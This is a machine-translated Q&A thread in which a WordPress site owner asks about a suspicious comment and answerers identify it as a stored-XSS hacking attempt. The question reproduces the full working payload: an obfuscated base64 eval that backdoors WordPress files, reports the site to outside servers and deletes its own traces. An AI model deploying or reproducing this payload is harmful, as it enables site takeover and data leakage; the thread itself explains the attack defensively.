问题描述

我收到了我的 WordPress 网站的电子邮件,其中注释部分被禁用。

这是电子邮件:

「作者:google(IP:210.56.50.40,210.56.50.40)

电邮:guest@gmail.com

网址:http://spider.google.com

谁是?:http://whois.arin.net/rest/ip/210.56.50.40

评论:

欢迎来到 WordPress 。这是你的第一篇文章。

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGU
 uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla
 V05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1amFHbHVZUzEwYjNWNWFXNW5hbWt1WTI5dEx5YzdDaUFnSUNBa2VpQTlJSE4wY2w5eVpYQnNZV05sS0NkM2NDMWpiMjUwWlc1MEwzQnNkV2RwYm5NdmFHVnNiRzh1Y0dod0p5d25KeXdrWDFORlVsWkZVbHNpVWtWUlZVVlRWRjlWVWtraVhTazdDaUFnSUNBa2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q2lBZ0lDQnphSFZtWm14bEtDUnlaV05wZG1WeWN5azdDaUFnSUNCbWIzSmxZV05vS0NSeVpXTnBkbVZ5Y3lCaGN5QWtkQ2w3Q2lBZ0lDQWdJQ0FnWldOb2J5QW5QR2x0WnlCM2FXUjBhRDB4SUdobGFXZG9kRDB4SUhOeVl6MGlKeUF1SkhRZ0xpQW5QMlJoZEdFOUp5QXVKSEpsY0c5eWRDNG5JajRuT3dvZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCeVpXMXZkbVZmWTI5dGJXVnVkQ2dwZXdvZ0lDQWdhVzVqYkhWa1pWOXZibU5sS0NjdUxpOHVMaTkzY0MxamIyNW1hV2N1Y0dod0p5azdDZ29nSUNBZ0pHTnZiaUE5SUcxNWMzRnNYMk52Ym01bFkzUW9SRUpmU0U5VFZDeEVRbDlWVTBWU0xFUkNYMUJCVTFOWFQxSkVLVHNLSUNBZ0lHMTVjM0ZzWDNObGJHVmpkRjlrWWloRVFsOU9RVTFGTENBa1kyOXVLVHNLQ2lBZ0lDQWtlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXM
 WxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSUNBZ0lDUnlJRDBnYlhsemNXeGZjWFZsY25rb0pIcGhjSEp2Y3lrN0NpQWdJQ0J0ZVhOeGJGOWpiRzl6WlNna1kyOXVLVHNLZlFvS1puVnVZM1JwYjI0Z2NHRjBZMmhmZDNBb0tYc0tJQ0FnSUNSbWJtRnRaU0E5SUNjdUxpOHVMaTkzY0MxamIyMXRaVzUwY3kxd2IzTjBMbkJvY0NjN0NpQWdJQ0JwWmlobWFXeGxYMlY0YVhOMGN5Z2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWtkQ0E5SUNjOFAzQm9jQ0JrYVdVb0tUc2dQejRuSUM0Z1VFaFFYMFZQVERzS0NpQWdJQ0FnSUNBZ0pIUnBiV1VnUFNCbWFXeGxiWFJwYldVb0pHWnVZVzFsS1RzS0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUdaaGJITmxPd29LSUNBZ0lDQWdJQ0JwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ0FnSUNBa2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUhSeWRXVTdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29nSUNBZ0lDQWdJR2xtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWdJQ0FnSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aG
 JXVXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2RHMXdJRDBnSkhRZ0xpQWtkRzF3T3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCcFppQW9jM1J5YkdWdUtDUjBiWEFwSUQ0Z01UQXBld29LSUNBZ0lDQWdJQ0FnSUNBZ0pHWWdQU0JtYjNCbGJpZ2tabTVoYldVc0luY2lLVHNLSUNBZ0lDQWdJQ0FnSUNBZ1puQjFkSE1vSkdZc0pIUnRjQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWmpiRzl6WlNna1ppazdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29LSUNBZ0lDQWdJQ0JwWmlBb0pIZHlhWFFwZXdvZ0lDQWdJQ0FnSUNBZ0lDQm1iM0lvSkdrOWMzUnliR1Z1S0NSd1pYSnRLUzB4T3lScFBqMHdPeTB0SkdrcGV3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pIQmxjbTF6SUNzOUlDaHBiblFwSkhCbGNtMWJKR2xkS25CdmR5ZzRMQ0FvYzNSeWJHVnVLQ1J3WlhKdEtTMGthUzB4S1NrN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd29nSUNBZ0lDQWdJSDBLQ2lBZ0lDQWdJQ0FnUUhSdmRXTm9LQ1JtYm1GdFpTd2tkR2x0WlNrN0NpQWdJQ0I5Q24wS0NtWjFibU4wYVc5dUlITmxiR1pmY21WdGIzWmxLQ2w3Q2lBZ0lDQWtabTVoYldVZ1BTQmZYMFpKVEVWZlh6c0tJQ0FnSUNSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEd
 GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3
 T3kwdEpHa3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSEJsY20xeklDczlJQ2hwYm5RcEpIQmxjbTFiSkdsZEtuQnZkeWc0TENBb2MzUnliR1Z1S0NSd1pYSnRLUzBrYVMweEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdRR05vYlc5a0tDUm1ibUZ0WlN3a2NHVnliWE1wT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDaUFnSUNCOUNuMEtDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjI1bWFXY3VjR2h3SnpzS0NtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWJtRnRaU2twZXdvS0lDQWdJQ1J5WTJRZ0lEMGdiV1ExS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTNGtYMU5GVWxaRlVsc2lTRlJVVUY5VlUwVlNYMEZIUlU1VUlsMHVjbUZ1WkNnd0xERXdNREF3S1NrN0NpQWdJQ0FrZENBOUlDZHBaaUFvYVhOelpYUW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2twZXlSZlUwVlNWa1ZTVXlBOUlITjBjbkpsZGlna1gxSkZVVlZGVTFSYlhDY25MaVJ5WTJRdUoxd25YU2s3SkY5R1NVeEZJRDBnSkY5VFJWSldSVkpUS0Z3bkpGOWNKeXh6ZEhKeVpYWW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2t1WENjb0pGOHBPMXduS1Rza1gwWkpURVVvYzNSeWFYQnpiR0Z6YUdWektDUmZVa1ZSVlVWVFZGdGNKMGhQVTFSY0oxMHBLVHQ5SnpzS0lDQWdJQ1IwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaUFnSUNBa2MybDZaU
 0E5SUdacGJHVnphWHBsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEdGaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSFJ0Y0NBOUlITjBjbDl5WlhCc1lXTmxLQ2NrZEdGaWJHVmZjSEpsWm1sNEp5d2dKSFFnTGlCUVNGQmZSVTlNSUM0Z0p5UjBZV0pzWlY5d2NtVm1hWGduTENBa2RHMXdLVHNLSUNBZ0lDQWdJQ0JwWmlBb2MzUnliR1Z1S0NSMGJYQXBJRDRnTVRBcGV3b0tJQ0FnSUNBZ0lDQWdJQ0FnSkdZZ1BTQm1iM0JsYmlna1ptNWhiV1VzSW5jaUtUc0tJQ0FnSUNBZ0lDQWdJQ0FnWm5CMWRITW9KR1lzSkhSdGNDazdDaUFnSUNBZ0lDQWdJQ0FnSUdaamJHOXpaU2drWmlrN0NpQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b0tJQ0FnSUNBZ0lDQnBaaUFvSkhkeWFYUXBld29nSUNBZ0lDQW
 dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>]

编辑或者删除它,然后开始写博客! 「

这是什么?我已经删除了评论,但我很好奇。

最佳解决方案

“Code” 是您的 WordPress 安装 (wp-comments-post.php) 的”patching”,并将一些信息发送到多个服务器 (可能是 c& c) 。此外,它正在从数据库中删除自己。

换句话说,这是一个黑客。您收到的电子邮件不是来自 Google 官方的。来自 Gmail 帐户。

解码的来源在这里:

漏洞利用是基于 WordPress 3.x 持续脚本注入:http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection

次佳解决方案

这是一个黑客尝试,其中包含使用 Base64 编码隐藏恶意有效载荷代码的字符的特殊组合。

隐藏的代码依赖于使用的旧版本的 WordPress,例如版本 3.5 。在这些旧版本中,有一些技巧已被发现。这些技巧愚弄了防止脚本插入注释的安全措施。它是使用精心制作的字符组合,这些字符被误解为短码,HTML 和文本,允许访问鼠标悬停 JavaScript 事件。

提示:保留最新版本的 WORDPRESS

当鼠标悬停由以管理员身份登录的某人触发时,注释中的任何恶意代码就像管理员执行一样执行。

参考文献

注:本文内容整合自 Google/Baidu/Bing 辅助翻译的英文资料结果。如果您对结果不满意,可以加入我们改善翻译效果:薇晓朵技术论坛。